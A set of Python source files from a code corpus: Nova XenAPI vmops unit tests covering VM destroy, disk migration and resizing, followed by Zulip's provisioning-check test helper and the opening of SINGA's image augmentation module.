        self.mox.StubOutWithMock(vm_utils, 'create_vbd')
        vm_utils.lookup(self.vmops._session, "dummy").AndReturn("ref")
        self.vmops._find_vdi_refs("ref", exclude_volumes=True).AndReturn(
                vbd_refs)
        vm_utils.create_vbd(self.vmops._session, vm_ref, "vdi_ref",
                            vmops.DEVICE_RESCUE, bootable=False)
        self.mox.ReplayAll()
        self.vmops._attach_orig_disks(instance, vm_ref)
    def test_agent_update_setup(self):
        # agent updates need to occur after networking is configured
        instance = {'name': 'betelgeuse',
                    'uuid': '1-2-3-4-5-6'}
        vm_ref = 'vm_ref'
        agent = xenapi_agent.XenAPIBasedAgent(self.vmops._session,
                self.vmops._virtapi, instance, vm_ref)
        self.mox.StubOutWithMock(xenapi_agent, 'should_use_agent')
        self.mox.StubOutWithMock(self.vmops, '_get_agent')
        self.mox.StubOutWithMock(agent, 'get_version')
        self.mox.StubOutWithMock(agent, 'resetnetwork')
        self.mox.StubOutWithMock(agent, 'update_if_needed')
        xenapi_agent.should_use_agent(instance).AndReturn(True)
        self.vmops._get_agent(instance, vm_ref).AndReturn(agent)
        agent.get_version().AndReturn('1.2.3')
        agent.resetnetwork()
        agent.update_if_needed('1.2.3')
        self.mox.ReplayAll()
        self.vmops._configure_new_instance_with_agent(instance, vm_ref,
                None, None)
class DestroyTestCase(VMOpsTestBase):
    """Tests for VMOps.destroy when the VM record no longer exists."""

    def setUp(self):
        super(DestroyTestCase, self).setUp()
        self.context = context.RequestContext(user_id=None, project_id=None)
        self.instance = fake_instance.fake_instance_obj(self.context)

    @mock.patch.object(vm_utils, 'lookup', side_effect=[None, None])
    @mock.patch.object(vm_utils, 'hard_shutdown_vm')
    @mock.patch.object(volume_utils, 'find_sr_by_uuid')
    @mock.patch.object(volume_utils, 'forget_sr')
    def test_no_vm_no_bdm(self, mock_forget_sr, mock_find_sr,
                          mock_hard_shutdown, mock_lookup):
        """With no VM and no volumes there is nothing to clean up."""
        empty_bdi = {'block_device_mapping': []}
        self.vmops.destroy(self.instance, 'network_info', empty_bdi)
        self.assertEqual(0, mock_find_sr.call_count)
        self.assertEqual(0, mock_forget_sr.call_count)
        self.assertEqual(0, mock_hard_shutdown.call_count)

    @mock.patch.object(vm_utils, 'lookup', side_effect=[None, None])
    @mock.patch.object(vm_utils, 'hard_shutdown_vm')
    @mock.patch.object(volume_utils, 'find_sr_by_uuid', return_value=None)
    @mock.patch.object(volume_utils, 'forget_sr')
    def test_no_vm_orphaned_volume_no_sr(self, mock_forget_sr, mock_find_sr,
                                         mock_hard_shutdown, mock_lookup):
        """An orphaned volume whose SR is already gone: the SR is looked
        up but nothing is forgotten."""
        volume_bdi = {'block_device_mapping': [
            {'connection_info': {'data': {'volume_id': 'fake-uuid'}}}]}
        self.vmops.destroy(self.instance, 'network_info', volume_bdi)
        mock_find_sr.assert_called_once_with(self.vmops._session,
                                             'FA15E-D15C-fake-uuid')
        self.assertEqual(0, mock_forget_sr.call_count)
        self.assertEqual(0, mock_hard_shutdown.call_count)

    @mock.patch.object(vm_utils, 'lookup', side_effect=[None, None])
    @mock.patch.object(vm_utils, 'hard_shutdown_vm')
    @mock.patch.object(volume_utils, 'find_sr_by_uuid', return_value='sr_ref')
    @mock.patch.object(volume_utils, 'forget_sr')
    def test_no_vm_orphaned_volume(self, mock_forget_sr, mock_find_sr,
                                   mock_hard_shutdown, mock_lookup):
        """An orphaned volume with a live SR must have that SR forgotten."""
        volume_bdi = {'block_device_mapping': [
            {'connection_info': {'data': {'volume_id': 'fake-uuid'}}}]}
        self.vmops.destroy(self.instance, 'network_info', volume_bdi)
        mock_find_sr.assert_called_once_with(self.vmops._session,
                                             'FA15E-D15C-fake-uuid')
        mock_forget_sr.assert_called_once_with(self.vmops._session, 'sr_ref')
        self.assertEqual(0, mock_hard_shutdown.call_count)
@mock.patch.object(vmops.VMOps, '_update_instance_progress')
@mock.patch.object(vmops.VMOps, '_get_vm_opaque_ref')
@mock.patch.object(vm_utils, 'get_sr_path')
@mock.patch.object(vmops.VMOps, '_detach_block_devices_from_orig_vm')
@mock.patch.object(vmops.VMOps, '_migrate_disk_resizing_down')
@mock.patch.object(vmops.VMOps, '_migrate_disk_resizing_up')
class MigrateDiskAndPowerOffTestCase(VMOpsTestBase):
    """Tests that migrate_disk_and_power_off picks the right resize path."""

    def setUp(self):
        super(MigrateDiskAndPowerOffTestCase, self).setUp()
        self.context = context.RequestContext('user', 'project')

    def test_migrate_disk_and_power_off_works_down(self,
            migrate_up, migrate_down, *mocks):
        """Shrinking the root disk must take the resize-down path."""
        instance = dict(root_gb=2, ephemeral_gb=0, uuid="uuid")
        flavor = fake_flavor.fake_flavor_obj(self.context, root_gb=1,
                                             ephemeral_gb=0)
        self.vmops.migrate_disk_and_power_off(None, instance, None,
                                              flavor, None)
        self.assertTrue(migrate_down.called)
        self.assertFalse(migrate_up.called)

    def test_migrate_disk_and_power_off_works_up(self,
            migrate_up, migrate_down, *mocks):
        """Growing both disks must take the resize-up path."""
        instance = dict(root_gb=1, ephemeral_gb=1, uuid="uuid")
        flavor = fake_flavor.fake_flavor_obj(self.context, root_gb=2,
                                             ephemeral_gb=2)
        self.vmops.migrate_disk_and_power_off(None, instance, None,
                                              flavor, None)
        self.assertTrue(migrate_up.called)
        self.assertFalse(migrate_down.called)

    def test_migrate_disk_and_power_off_resize_down_ephemeral_fails(self,
            migrate_up, migrate_down, *mocks):
        """Shrinking ephemeral disks is unsupported and must raise."""
        instance = dict(ephemeral_gb=2)
        flavor = fake_flavor.fake_flavor_obj(self.context, ephemeral_gb=1)
        self.assertRaises(exception.ResizeError,
                          self.vmops.migrate_disk_and_power_off,
                          None, instance, None, flavor, None)
@mock.patch.object(vm_utils, 'get_vdi_for_vm_safely')
@mock.patch.object(vm_utils, 'migrate_vhd')
@mock.patch.object(vmops.VMOps, '_resize_ensure_vm_is_shutdown')
@mock.patch.object(vm_utils, 'get_all_vdi_uuids_for_vm')
@mock.patch.object(vmops.VMOps, '_update_instance_progress')
@mock.patch.object(vmops.VMOps, '_apply_orig_vm_name_label')
class MigrateDiskResizingUpTestCase(VMOpsTestBase):
    """Tests for VMOps._migrate_disk_resizing_up."""
    def _fake_snapshot_attached_here(self, session, instance, vm_ref, label,
                                     userdevice, post_snapshot_callback):
        """Generator standing in for vm_utils._snapshot_attached_here_impl.

        Yields a fake VHD chain for the given userdevice: the root disk
        (userdevice '0') gets a three-entry chain, other disks a two-entry
        one keyed by their device number.
        """
        self.assertIsInstance(instance, dict)
        if userdevice == '0':
            self.assertEqual("vm_ref", vm_ref)
            self.assertEqual("fake-snapshot", label)
            yield ["leaf", "parent", "grandp"]
        else:
            leaf = userdevice + "-leaf"
            parent = userdevice + "-parent"
            yield [leaf, parent]
    @mock.patch.object(volume_utils, 'is_booted_from_volume',
                       return_value=False)
    def test_migrate_disk_resizing_up_works_no_ephemeral(self,
            mock_is_booted_from_volume,
            mock_apply_orig, mock_update_progress, mock_get_all_vdi_uuids,
            mock_shutdown, mock_migrate_vhd, mock_get_vdi_for_vm):
        """Root-only resize up: snapshot chain and root VHD are migrated
        and progress is reported for steps 1-4 (5/5 happens in
        finish_migration)."""
        context = "ctxt"
        instance = {"name": "fake", "uuid": "uuid"}
        dest = "dest"
        vm_ref = "vm_ref"
        sr_path = "sr_path"
        mock_get_all_vdi_uuids.return_value = None
        mock_get_vdi_for_vm.return_value = ({}, {"uuid": "root"})
        with mock.patch.object(vm_utils, '_snapshot_attached_here_impl',
                               self._fake_snapshot_attached_here):
            self.vmops._migrate_disk_resizing_up(context, instance, dest,
                                                 vm_ref, sr_path)
        mock_get_all_vdi_uuids.assert_called_once_with(self.vmops._session,
                vm_ref, min_userdevice=4)
        mock_apply_orig.assert_called_once_with(instance, vm_ref)
        mock_shutdown.assert_called_once_with(instance, vm_ref)
        # The snapshot ancestors migrate first (while running), then the
        # leaf/root after shutdown.
        m_vhd_expected = [mock.call(self.vmops._session, instance, "parent",
                                    dest, sr_path, 1),
                          mock.call(self.vmops._session, instance, "grandp",
                                    dest, sr_path, 2),
                          mock.call(self.vmops._session, instance, "root",
                                    dest, sr_path, 0)]
        self.assertEqual(m_vhd_expected, mock_migrate_vhd.call_args_list)
        prog_expected = [
            mock.call(context, instance, 1, 5),
            mock.call(context, instance, 2, 5),
            mock.call(context, instance, 3, 5),
            mock.call(context, instance, 4, 5)
            # 5/5: step to be executed by finish migration.
        ]
        self.assertEqual(prog_expected, mock_update_progress.call_args_list)
    @mock.patch.object(volume_utils, 'is_booted_from_volume',
                       return_value=False)
    def test_migrate_disk_resizing_up_works_with_two_ephemeral(self,
            mock_is_booted_from_volume,
            mock_apply_orig, mock_update_progress, mock_get_all_vdi_uuids,
            mock_shutdown, mock_migrate_vhd, mock_get_vdi_for_vm):
        """Root plus two ephemeral disks (userdevices 4 and 5): each
        disk's chain is migrated with its ephemeral index appended."""
        context = "ctxt"
        instance = {"name": "fake", "uuid": "uuid"}
        dest = "dest"
        vm_ref = "vm_ref"
        sr_path = "sr_path"
        mock_get_all_vdi_uuids.return_value = ["vdi-eph1", "vdi-eph2"]
        mock_get_vdi_for_vm.side_effect = [({}, {"uuid": "root"}),
                                           ({}, {"uuid": "4-root"}),
                                           ({}, {"uuid": "5-root"})]
        with mock.patch.object(vm_utils, '_snapshot_attached_here_impl',
                               self._fake_snapshot_attached_here):
            self.vmops._migrate_disk_resizing_up(context, instance, dest,
                                                 vm_ref, sr_path)
        mock_get_all_vdi_uuids.assert_called_once_with(self.vmops._session,
                vm_ref, min_userdevice=4)
        mock_apply_orig.assert_called_once_with(instance, vm_ref)
        mock_shutdown.assert_called_once_with(instance, vm_ref)
        m_vhd_expected = [mock.call(self.vmops._session, instance,
                                    "parent", dest, sr_path, 1),
                          mock.call(self.vmops._session, instance,
                                    "grandp", dest, sr_path, 2),
                          mock.call(self.vmops._session, instance,
                                    "4-parent", dest, sr_path, 1, 1),
                          mock.call(self.vmops._session, instance,
                                    "5-parent", dest, sr_path, 1, 2),
                          mock.call(self.vmops._session, instance,
                                    "root", dest, sr_path, 0),
                          mock.call(self.vmops._session, instance,
                                    "4-root", dest, sr_path, 0, 1),
                          mock.call(self.vmops._session, instance,
                                    "5-root", dest, sr_path, 0, 2)]
        self.assertEqual(m_vhd_expected, mock_migrate_vhd.call_args_list)
        prog_expected = [
            mock.call(context, instance, 1, 5),
            mock.call(context, instance, 2, 5),
            mock.call(context, instance, 3, 5),
            mock.call(context, instance, 4, 5)
            # 5/5: step to be executed by finish migration.
        ]
        self.assertEqual(prog_expected, mock_update_progress.call_args_list)
    @mock.patch.object(volume_utils, 'is_booted_from_volume',
                       return_value=True)
    def test_migrate_disk_resizing_up_booted_from_volume(self,
            mock_is_booted_from_volume,
            mock_apply_orig, mock_update_progress, mock_get_all_vdi_uuids,
            mock_shutdown, mock_migrate_vhd, mock_get_vdi_for_vm):
        """Volume-backed root: only the ephemeral disks are migrated."""
        context = "ctxt"
        instance = {"name": "fake", "uuid": "uuid"}
        dest = "dest"
        vm_ref = "vm_ref"
        sr_path = "sr_path"
        mock_get_all_vdi_uuids.return_value = ["vdi-eph1", "vdi-eph2"]
        mock_get_vdi_for_vm.side_effect = [({}, {"uuid": "4-root"}),
                                           ({}, {"uuid": "5-root"})]
        with mock.patch.object(vm_utils, '_snapshot_attached_here_impl',
                               self._fake_snapshot_attached_here):
            self.vmops._migrate_disk_resizing_up(context, instance, dest,
                                                 vm_ref, sr_path)
        mock_get_all_vdi_uuids.assert_called_once_with(self.vmops._session,
                vm_ref, min_userdevice=4)
        mock_apply_orig.assert_called_once_with(instance, vm_ref)
        mock_shutdown.assert_called_once_with(instance, vm_ref)
        m_vhd_expected = [mock.call(self.vmops._session, instance,
                                    "4-parent", dest, sr_path, 1, 1),
                          mock.call(self.vmops._session, instance,
                                    "5-parent", dest, sr_path, 1, 2),
                          mock.call(self.vmops._session, instance,
                                    "4-root", dest, sr_path, 0, 1),
                          mock.call(self.vmops._session, instance,
                                    "5-root", dest, sr_path, 0, 2)]
        self.assertEqual(m_vhd_expected, mock_migrate_vhd.call_args_list)
        prog_expected = [
            mock.call(context, instance, 1, 5),
            mock.call(context, instance, 2, 5),
            mock.call(context, instance, 3, 5),
            mock.call(context, instance, 4, 5)
            # 5/5: step to be executed by finish migration.
        ]
        self.assertEqual(prog_expected, mock_update_progress.call_args_list)
    @mock.patch.object(vmops.VMOps, '_restore_orig_vm_and_cleanup_orphan')
    @mock.patch.object(volume_utils, 'is_booted_from_volume',
                       return_value=False)
    def test_migrate_disk_resizing_up_rollback(self,
            mock_is_booted_from_volume,
            mock_restore,
            mock_apply_orig, mock_update_progress, mock_get_all_vdi_uuids,
            mock_shutdown, mock_migrate_vhd, mock_get_vdi_for_vm):
        """A migrate_vhd failure triggers the restore path; even when that
        restore itself fails, InstanceFaultRollback is raised."""
        context = "ctxt"
        instance = {"name": "fake", "uuid": "fake"}
        dest = "dest"
        vm_ref = "vm_ref"
        sr_path = "sr_path"
        mock_migrate_vhd.side_effect = test.TestingException
        mock_restore.side_effect = test.TestingException
        with mock.patch.object(vm_utils, '_snapshot_attached_here_impl',
                               self._fake_snapshot_attached_here):
            self.assertRaises(exception.InstanceFaultRollback,
                              self.vmops._migrate_disk_resizing_up,
                              context, instance, dest, vm_ref, sr_path)
        mock_apply_orig.assert_called_once_with(instance, vm_ref)
        mock_restore.assert_called_once_with(instance)
        mock_migrate_vhd.assert_called_once_with(self.vmops._session,
                instance, "parent", dest, sr_path, 1)
class CreateVMRecordTestCase(VMOpsTestBase):
    """Tests for VMOps._create_vm_record."""

    @mock.patch.object(vm_utils, 'determine_vm_mode')
    @mock.patch.object(vm_utils, 'get_vm_device_id')
    @mock.patch.object(vm_utils, 'create_vm')
    def test_create_vm_record_with_vm_device_id(self, mock_create_vm,
            mock_get_vm_device_id, mock_determine_vm_mode):
        """The device id resolved from the image must reach create_vm."""
        device_id = "0002"
        image_meta = objects.ImageMeta.from_dict(
            {"properties": {"xenapi_device_id": device_id}})
        instance = objects.Instance(vm_mode="vm_mode", uuid="uuid123")
        session = "session"
        self.vmops._session = session
        mock_get_vm_device_id.return_value = device_id
        mock_determine_vm_mode.return_value = "vm_mode"
        self.vmops._create_vm_record("context", instance, "dummy", "vhd",
                                     "kernel", "ram", image_meta, False)
        mock_get_vm_device_id.assert_called_with(session, image_meta)
        # The final positional args are use_pv_kernel=False and device_id.
        mock_create_vm.assert_called_with(session, instance, "dummy",
                                          "kernel", "ram", False, device_id)
class BootableTestCase(VMOpsTestBase):
    """Tests for the 'start' bootlock handling on a VM record."""

    def setUp(self):
        super(BootableTestCase, self).setUp()
        self.instance = {"name": "test", "uuid": "fake"}
        vm_rec, self.vm_ref = self.create_vm('test')
        # A freshly created VM must start with no blocked operations.
        self.assertEqual({}, vm_rec['blocked_operations'])

    def _get_blocked(self):
        """Return the blocked_operations map of the test VM."""
        vm_rec = self._session.call_xenapi("VM.get_record", self.vm_ref)
        return vm_rec['blocked_operations']

    def test_acquire_bootlock(self):
        self.vmops._acquire_bootlock(self.vm_ref)
        self.assertIn('start', self._get_blocked())

    def test_release_bootlock(self):
        self.vmops._acquire_bootlock(self.vm_ref)
        self.vmops._release_bootlock(self.vm_ref)
        self.assertNotIn('start', self._get_blocked())

    def test_set_bootable(self):
        self.vmops.set_bootable(self.instance, True)
        self.assertNotIn('start', self._get_blocked())

    def test_set_not_bootable(self):
        self.vmops.set_bootable(self.instance, False)
        self.assertIn('start', self._get_blocked())
@mock.patch.object(vm_utils, 'update_vdi_virtual_size', autospec=True)
class ResizeVdisTestCase(VMOpsTestBase):
    """Tests for VMOps._resize_up_vdis."""
    def test_dont_resize_root_volumes_osvol_false(self, mock_resize):
        """A root VDI with osvol=False is a normal disk and is resized."""
        instance = fake_instance.fake_db_instance(root_gb=20)
        vdis = {'root': {'osvol': False, 'ref': 'vdi_ref'}}
        self.vmops._resize_up_vdis(instance, vdis)
        self.assertTrue(mock_resize.called)
    def test_dont_resize_root_volumes_osvol_true(self, mock_resize):
        """A volume-backed root (osvol=True) must not be resized."""
        instance = fake_instance.fake_db_instance(root_gb=20)
        vdis = {'root': {'osvol': True}}
        self.vmops._resize_up_vdis(instance, vdis)
        self.assertFalse(mock_resize.called)
    def test_dont_resize_root_volumes_no_osvol(self, mock_resize):
        """A root dict without a ref is not resized."""
        instance = fake_instance.fake_db_instance(root_gb=20)
        vdis = {'root': {}}
        self.vmops._resize_up_vdis(instance, vdis)
        self.assertFalse(mock_resize.called)
    @mock.patch.object(vm_utils, 'get_ephemeral_disk_sizes')
    def test_ensure_ephemeral_resize_with_root_volume(self, mock_sizes,
                                                      mock_resize):
        """Ephemeral disks are still resized even when the root is a
        volume; no new ephemerals are generated."""
        mock_sizes.return_value = [2000, 1000]
        instance = fake_instance.fake_db_instance(root_gb=20, ephemeral_gb=20)
        ephemerals = {"4": {"ref": 4}, "5": {"ref": 5}}
        vdis = {'root': {'osvol': True, 'ref': 'vdi_ref'},
                'ephemerals': ephemerals}
        with mock.patch.object(vm_utils, 'generate_single_ephemeral',
                               autospec=True) as g:
            self.vmops._resize_up_vdis(instance, vdis)
            self.assertEqual([mock.call(self.vmops._session, instance, 4,
                                        2000),
                              mock.call(self.vmops._session, instance, 5,
                                        1000)],
                             mock_resize.call_args_list)
            self.assertFalse(g.called)
    def test_resize_up_vdis_root(self, mock_resize):
        """With only a root disk, that disk is resized to root_gb."""
        instance = {"root_gb": 20, "ephemeral_gb": 0}
        self.vmops._resize_up_vdis(instance, {"root": {"ref": "vdi_ref"}})
        mock_resize.assert_called_once_with(self.vmops._session, instance,
                                            "vdi_ref", 20)
    def test_resize_up_vdis_zero_disks(self, mock_resize):
        """Zero-sized disks are never resized."""
        instance = {"root_gb": 0, "ephemeral_gb": 0}
        self.vmops._resize_up_vdis(instance, {"root": {}})
        self.assertFalse(mock_resize.called)
    def test_resize_up_vdis_no_vdis_like_initial_spawn(self, mock_resize):
        """An empty vdis dict (as on initial spawn) is a no-op."""
        instance = {"root_gb": 0, "ephemeral_gb": 3000}
        vdis = {}
        self.vmops._resize_up_vdis(instance, vdis)
        self.assertFalse(mock_resize.called)
    @mock.patch.object(vm_utils, 'get_ephemeral_disk_sizes')
    def test_resize_up_vdis_ephemeral(self, mock_sizes, mock_resize):
        """Each existing ephemeral VDI is resized to its computed size."""
        mock_sizes.return_value = [2000, 1000]
        instance = {"root_gb": 0, "ephemeral_gb": 3000}
        ephemerals = {"4": {"ref": 4}, "5": {"ref": 5}}
        vdis = {"ephemerals": ephemerals}
        self.vmops._resize_up_vdis(instance, vdis)
        mock_sizes.assert_called_once_with(3000)
        expected = [mock.call(self.vmops._session, instance, 4, 2000),
                    mock.call(self.vmops._session, instance, 5, 1000)]
        self.assertEqual(expected, mock_resize.call_args_list)
    @mock.patch.object(vm_utils, 'generate_single_ephemeral')
    @mock.patch.object(vm_utils, 'get_ephemeral_disk_sizes')
    def test_resize_up_vdis_ephemeral_with_generate(self, mock_sizes,
                                                    mock_generate,
                                                    mock_resize):
        """A missing ephemeral (userdevice 5) is generated while the
        existing one (userdevice 4) is resized."""
        mock_sizes.return_value = [2000, 1000]
        instance = {"root_gb": 0, "ephemeral_gb": 3000, "uuid": "a"}
        ephemerals = {"4": {"ref": 4}}
        vdis = {"ephemerals": ephemerals}
        self.vmops._resize_up_vdis(instance, vdis)
        mock_sizes.assert_called_once_with(3000)
        mock_resize.assert_called_once_with(self.vmops._session, instance,
                                            4, 2000)
        mock_generate.assert_called_once_with(self.vmops._session, instance,
                                              None, 5, 1000)
@mock.patch.object(vm_utils, 'remove_old_snapshots')
class CleanupFailedSnapshotTestCase(VMOpsTestBase):
    """Tests for VMOps.post_interrupted_snapshot_cleanup."""

    def test_post_interrupted_snapshot_cleanup(self, mock_remove):
        """Cleanup resolves the VM ref and removes stale snapshots."""
        self.vmops._get_vm_opaque_ref = mock.Mock(return_value="vm_ref")
        self.vmops.post_interrupted_snapshot_cleanup("context", "instance")
        mock_remove.assert_called_once_with(self.vmops._session,
                                            "instance", "vm_ref")
class LiveMigrateHelperTestCase(VMOpsTestBase):
    """Tests for VMOps.connect_block_device_volumes."""

    def test_connect_block_device_volumes_none(self):
        """No block device info yields an empty SR mapping."""
        self.assertEqual({}, self.vmops.connect_block_device_volumes(None))

    @mock.patch.object(volumeops.VolumeOps, "connect_volume")
    def test_connect_block_device_volumes_calls_connect(self, mock_connect):
        """Each mapping entry is connected and its SR ref is looked up."""
        mock_connect.return_value = ("sr_uuid", None)
        bdi = {"block_device_mapping": [{"connection_info": "c_info"}]}
        with mock.patch.object(self.vmops._session,
                               "call_xenapi") as mock_session:
            mock_session.return_value = "sr_ref"
            result = self.vmops.connect_block_device_volumes(bdi)
            self.assertEqual({'sr_uuid': 'sr_ref'}, result)
            mock_connect.assert_called_once_with("c_info")
            mock_session.assert_called_once_with("SR.get_by_uuid",
                                                 "sr_uuid")
@mock.patch.object(vmops.VMOps, '_resize_ensure_vm_is_shutdown')
@mock.patch.object(vmops.VMOps, '_apply_orig_vm_name_label')
@mock.patch.object(vmops.VMOps, '_update_instance_progress')
@mock.patch.object(vm_utils, 'get_vdi_for_vm_safely')
@mock.patch.object(vm_utils, 'resize_disk')
@mock.patch.object(vm_utils, 'migrate_vhd')
@mock.patch.object(vm_utils, 'destroy_vdi')
class MigrateDiskResizingDownTestCase(VMOpsTestBase):
    """Tests for VMOps._migrate_disk_resizing_down."""
    def test_migrate_disk_resizing_down_works_no_ephemeral(
            self,
            mock_destroy_vdi,
            mock_migrate_vhd,
            mock_resize_disk,
            mock_get_vdi_for_vm_safely,
            mock_update_instance_progress,
            mock_apply_orig_vm_name_label,
            mock_resize_ensure_vm_is_shutdown):
        """The root disk is shut down, resized to a new VDI, migrated,
        and the temporary resized VDI is destroyed afterwards."""
        context = "ctx"
        instance = {"name": "fake", "uuid": "uuid"}
        dest = "dest"
        vm_ref = "vm_ref"
        sr_path = "sr_path"
        instance_type = dict(root_gb=1)
        old_vdi_ref = "old_ref"
        new_vdi_ref = "new_ref"
        new_vdi_uuid = "new_uuid"
        mock_get_vdi_for_vm_safely.return_value = (old_vdi_ref, None)
        mock_resize_disk.return_value = (new_vdi_ref, new_vdi_uuid)
        self.vmops._migrate_disk_resizing_down(context, instance, dest,
                                               instance_type, vm_ref, sr_path)
        mock_get_vdi_for_vm_safely.assert_called_once_with(
            self.vmops._session,
            vm_ref)
        mock_resize_ensure_vm_is_shutdown.assert_called_once_with(
            instance, vm_ref)
        mock_apply_orig_vm_name_label.assert_called_once_with(
            instance, vm_ref)
        mock_resize_disk.assert_called_once_with(
            self.vmops._session,
            instance,
            old_vdi_ref,
            instance_type)
        mock_migrate_vhd.assert_called_once_with(
            self.vmops._session,
            instance,
            new_vdi_uuid,
            dest,
            sr_path, 0)
        mock_destroy_vdi.assert_called_once_with(
            self.vmops._session,
            new_vdi_ref)
        prog_expected = [
            mock.call(context, instance, 1, 5),
            mock.call(context, instance, 2, 5),
            mock.call(context, instance, 3, 5),
            mock.call(context, instance, 4, 5)
            # 5/5: step to be executed by finish migration.
        ]
        self.assertEqual(prog_expected,
                         mock_update_instance_progress.call_args_list)
class GetVdisForInstanceTestCase(VMOpsTestBase):
    """Tests get_vdis_for_instance utility method."""
    def setUp(self):
        super(GetVdisForInstanceTestCase, self).setUp()
        self.context = context.get_admin_context()
        self.context.auth_token = 'auth_token'
        self.session = mock.Mock()
        self.vmops._session = self.session
        self.instance = fake_instance.fake_instance_obj(self.context)
        self.name_label = 'name'
        self.image = 'fake_image_id'
    @mock.patch.object(volumeops.VolumeOps, "connect_volume",
                       return_value=("sr", "vdi_uuid"))
    def test_vdis_for_instance_bdi_password_scrubbed(self, get_uuid_mock):
        """The auth_password in connection info must never be logged."""
        # setup fake data
        data = {'name_label': self.name_label,
                'sr_uuid': 'fake',
                'auth_password': 'scrubme'}
        bdm = [{'mount_device': '/dev/vda',
                'connection_info': {'data': data}}]
        bdi = {'root_device_name': 'vda',
               'block_device_mapping': bdm}
        # Tests that the parameters to the to_xml method are sanitized for
        # passwords when logged.
        def fake_debug(*args, **kwargs):
            # Intercepts LOG.debug: whenever the connection data is
            # logged, the plaintext password must already be scrubbed.
            if 'auth_password' in args[0]:
                self.assertNotIn('scrubme', args[0])
                fake_debug.matched = True
        fake_debug.matched = False
        with mock.patch.object(vmops.LOG, 'debug',
                               side_effect=fake_debug) as debug_mock:
            vdis = self.vmops._get_vdis_for_instance(self.context,
                    self.instance, self.name_label, self.image,
                    image_type=4, block_device_info=bdi)
            self.assertEqual(1, len(vdis))
            get_uuid_mock.assert_called_once_with({"data": data})
            # we don't care what the log message is, we just want to make sure
            # our stub method is called which asserts the password is scrubbed
            self.assertTrue(debug_mock.called)
            self.assertTrue(fake_debug.matched)
| nikesh-mahalka/nova | nova/tests/unit/virt/xenapi/test_vmops.py | Python | apache-2.0 | 57,400 |
import glob
import os
import subprocess
import sys
from distutils.version import LooseVersion
from typing import Iterable, List, Optional, Tuple
from scripts.lib.zulip_tools import get_dev_uuid_var_path
from version import PROVISION_VERSION
ZULIP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
def get_major_version(v: str) -> int:
    """Return the leading integer component of a dotted version string."""
    major, _sep, _rest = v.partition('.')
    return int(major)
def get_version_file() -> str:
    """Path of the file recording the last provisioned version for this env."""
    return os.path.join(get_dev_uuid_var_path(), 'provision_version')
# Explanation template shown before any version-mismatch advice; the two
# %s slots are (recorded version, expected PROVISION_VERSION).
PREAMBLE = '''
Before we run tests, we make sure your provisioning version
is correct by looking at var/provision_version, which is at
version %s, and we compare it to the version in source
control (version.py), which is %s.
'''

def preamble(version: str) -> str:
    """Render the version-mismatch explanation, terminated by a newline."""
    return PREAMBLE % (version, PROVISION_VERSION) + '\n'
# Shown when var/provision_version records a NEWER major version than the
# current branch expects (see get_provisioning_status below).
NEED_TO_DOWNGRADE = '''
It looks like you checked out a branch that expects an older
version of dependencies than the version you provisioned last.
This may be ok, but it's likely that you either want to rebase
your branch on top of upstream/master or re-provision your VM.
Do this: `./tools/provision`
'''
# Shown when the current branch expects newer dependencies than the last
# recorded provision.
NEED_TO_UPGRADE = '''
It looks like you checked out a branch that has added
dependencies beyond what you last provisioned. Your command
is likely to fail until you add dependencies by provisioning.
Do this: `./tools/provision`
'''
def get_provisioning_status() -> Tuple[bool, Optional[str]]:
    """Return (ok, message); message explains how to fix things when not ok."""
    version_file = get_version_file()
    if not os.path.exists(version_file):
        # If the developer doesn't have a version_file written by a previous
        # provision, we skip the safety checks on the assumption that they
        # are managing their own dependencies and not running provision.
        return True, None
    with open(version_file) as f:
        recorded_version = f.read().strip()
    if recorded_version == PROVISION_VERSION:
        # Normal path for people that provision--we're all good!
        return True, None
    if LooseVersion(recorded_version) > LooseVersion(PROVISION_VERSION):
        # We may be more provisioned than the branch we just moved to; that
        # is fine as long as the major version hasn't changed.
        if get_major_version(recorded_version) == get_major_version(PROVISION_VERSION):
            return True, None
        return False, preamble(recorded_version) + NEED_TO_DOWNGRADE
    return False, preamble(recorded_version) + NEED_TO_UPGRADE
def assert_provisioning_status_ok(force: bool) -> None:
    """Exit with an explanation unless provisioning is current (or forced)."""
    if force:
        return
    ok, msg = get_provisioning_status()
    if ok:
        return
    print(msg)
    print('If you really know what you are doing, use --force to run anyway.')
    sys.exit(1)
def find_js_test_files(test_dir: str, files: Iterable[str]) -> List[str]:
    """Resolve the given names/prefixes to absolute test-file paths.

    Each entry in files is expanded to the first file in test_dir whose
    name starts with it; names that still don't exist as-is are assumed
    to live inside test_dir.  With no names given, every *.js file in
    test_dir is returned, sorted.
    """
    resolved = []
    for name in files:
        candidate = name
        for entry in os.listdir(test_dir):
            if entry.startswith(candidate):
                candidate = entry
                break
        if not os.path.exists(candidate):
            candidate = os.path.join(test_dir, candidate)
        resolved.append(os.path.abspath(candidate))
    if resolved:
        return resolved
    return sorted(glob.glob(os.path.join(test_dir, '*.js')))
def prepare_puppeteer_run() -> None:
    """Install the puppeteer browser and clear stale failure screenshots."""
    os.chdir(ZULIP_PATH)
    subprocess.check_call(['node', 'node_modules/puppeteer/install.js'])
    os.makedirs('var/puppeteer', exist_ok=True)
    # Remove screenshots left behind by previous failing runs.
    for screenshot in glob.glob('var/puppeteer/puppeteer-failure*.png'):
        os.remove(screenshot)
| shubhamdhama/zulip | tools/lib/test_script.py | Python | apache-2.0 | 3,557 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
'''
An utility model for image augmentation.
Example usage::
from singa import image_tool
tool = image_tool.ImageTool()
imgs = tool.load('input.png').\
resize_by_list([112]).crop5((96, 96), 5).enhance().flip().get()
for idx, img in enumerate(imgs):
img.save('%d.png' % idx)
'''
from __future__ import division
from builtins import range
from builtins import object
import random
import numpy as np
from PIL import Image, ImageEnhance
import math
def load_img(path, grayscale=False):
    '''Read the image at path, converted to 'L' (grayscale) or 'RGB'.

    The conversion is unconditional so callers always get a consistent
    channel layout regardless of the file's native mode.
    '''
    mode = 'L' if grayscale else 'RGB'
    return Image.open(path).convert(mode)
def crop(img, patch, position):
    '''Crop the input image into given size at given position.
    Args:
        patch(tuple): width and height of the patch
